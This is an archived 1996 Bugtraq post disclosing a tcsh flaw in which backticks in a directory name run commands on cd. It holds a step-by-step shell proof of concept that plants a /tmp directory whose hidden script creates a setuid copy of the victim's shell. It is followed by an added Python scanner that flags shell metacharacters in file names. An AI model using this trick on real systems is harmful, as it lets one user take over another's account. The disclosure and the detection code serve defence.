Bugtraq mailing list archives

tee see shell problems


From: butafuco () mc net (test)
Date: Fri, 13 Sep 1996 09:03:00 -0500


A vulnerability exists in tcsh (tcsh 6.05, or the one that's being handed
out with BSDI anyway) that allows the execution of arbitrary commands
when changing into directories that are enclosed with backticks.  The
problem might also prove to be quite bad for tcsh scripts that find
themselves changing into directories on the fly.

Here is probably one of the dumbest methods possible that could be used to
exploit this weakness.

----------------------------Cut to Bad guy--------------------------------

jim% whoami
Evol bad guy
jim% mkdir /tmp/\`source\ .WaReZ\`
jim% echo echo #\\\!/bin/sh \> .\$\$ > /tmp/*W*/.WaReZ
jim% echo echo sh \> .\$\$ >> /tmp/*W*/.WaReZ
jim% echo chmod 4755 .\$\$ >> /tmp/*W*/.WaReZ
jim% chmod +x /tmp/*W*/.WaReZ

---------------------------Cut to unsuspecting foo------------------------

jim% whoami
Unsuspecting foo
jim% echo $SHELL
/bin/tcsh
jim% I just like to check that sometimes.
jim% Hey, I'm bored maybe I'll check /tmp for some neato stuff
jim% cd /tmp
jim% ls

`source .WaReZ`

jim% OH BOY!!! the jack pot!
jim% cd *WaReZ*
jim% ls

jim% oh, oh well maybe I'll check later...
jim% cd $HOME

----------------------------Cut to More Bad guy--------------------------

jim% ls -a /tmp/*W*/

.
..
.24753

jim% /tmp/*W*/.24753
$whoami
unsuspecting foo
$ hah.
---------------------------End Unix Parable-------------------------------
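Added example, not from the original post: a small Python scanner that flags directory entries whose names contain backticks or other shell metacharacters, the kind of name the cd trick above depends on. The scratch tree it builds is constructed for the demo; the directory names and the pattern list are assumptions.

```python
"""Flag file and directory names a csh/sh-family shell might re-evaluate.

Added example, not part of the Bugtraq post. A name containing a backtick
is harmless to the filesystem, but if a glob expands to it and the shell
re-evaluates the result (as the post describes for tcsh's cd), the text
inside the backticks runs as a command. This scanner finds such names.
"""
import os
import tempfile
from typing import Dict, List

# Tokens a shell may treat as substitution or separators when re-evaluating
# a word; the backtick is the one the post's directory name abuses.
SUSPECT_PATTERNS = {
    "`": "backtick command substitution",
    "$": "variable or $( ) expansion",
    ";": "command separator",
    "|": "pipe",
    "&": "background or and-list",
    "\n": "embedded newline",
}


def suspect_reasons(name: str) -> List[str]:
    """Return why a single entry name looks dangerous (empty list if clean)."""
    return [reason for token, reason in SUSPECT_PATTERNS.items() if token in name]


def scan_tree(root: str) -> Dict[str, List[str]]:
    """Walk root and map each flagged path to the reasons it was flagged."""
    findings: Dict[str, List[str]] = {}
    for dirpath, dirnames, filenames in os.walk(root):
        for entry in dirnames + filenames:
            reasons = suspect_reasons(entry)
            if reasons:
                findings[os.path.join(dirpath, entry)] = reasons
    return findings


def build_sample_tree() -> str:
    """Create a constructed scratch tree mimicking the post's /tmp layout."""
    base = tempfile.mkdtemp(prefix="tcsh-demo-")
    os.mkdir(os.path.join(base, "`source .WaReZ`"))  # the booby-trapped name
    os.mkdir(os.path.join(base, "normal_dir"))       # benign neighbour
    open(os.path.join(base, "notes.txt"), "w").close()
    return base


def scan_sample_tree() -> Dict[str, List[str]]:
    """Build the constructed tree and scan it; only the backtick name is flagged."""
    return scan_tree(build_sample_tree())


if __name__ == "__main__":
    for path, reasons in sorted(scan_sample_tree().items()):
        print(f"{path!r}: {', '.join(reasons)}")
```

The same check can run over a real /tmp with `scan_tree("/tmp")`; a hit there is a reason to inspect the entry before any interactive shell or script changes into it.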
